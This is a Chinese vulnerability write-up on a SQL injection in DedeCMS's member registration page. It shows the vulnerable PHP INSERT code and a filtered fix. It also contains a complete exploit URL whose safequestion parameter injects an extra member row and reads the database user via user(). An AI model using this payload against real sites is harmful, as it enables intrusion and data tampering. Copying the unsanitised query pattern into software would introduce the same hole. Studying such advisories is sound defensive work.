dedecms /member/reg_new.php SQL Injection Vul
2023-09-27 14:28:11 时间
catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
Dedecms会员中心注入漏洞
2. 漏洞触发条件
http://127.0.0.1/dedecms5.5/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree= //把vdcode=slum改成当前的验证码
Relevant Link:
http://0day5.com/archives/1315 http://www.odaysec.com/post/1cb671b0_2709bbf
3. 漏洞影响范围
4. 漏洞代码分析
/member/reg_new.php
.. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); //未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询 $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) ..
5. 防御方法
/member/reg_new.php
.. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); /* 对$mtype、$safeanswer、$safequestion进行有效过滤 */ $mtype = HtmlReplace($mtype,1); $safeanswer = HtmlReplace($safeanswer); $safequestion = HtmlReplace($safequestion); /* */ $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) { ..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
相关文章
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护Bypass之一些函数的错误使用
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode
- php之快速入门学习-11(数组排序)
- PHP加密解密AES算法
- PHP中魔术方法详解
- php 清除数组里的空值
- .NET/ASP.NET/C#/WCF/SQL Server/My SQL/Java/JSP/JDBC/Spring/Spring MVC/PHP/Python/Ruby/Shell/Agile/CSS/HTML/HTTP/Unix/Linux大量PDF书籍/电子书籍下载, Effective Java 下载
- PHP防XSS 防SQL注入的代码
- php 可逆加密方法
- PHP开发者常犯的10个MySQL错误
- PHP+MySQL 网站 SQL 注入攻击测试用例
- PHP防止SQL注入与几种正则表达式讲解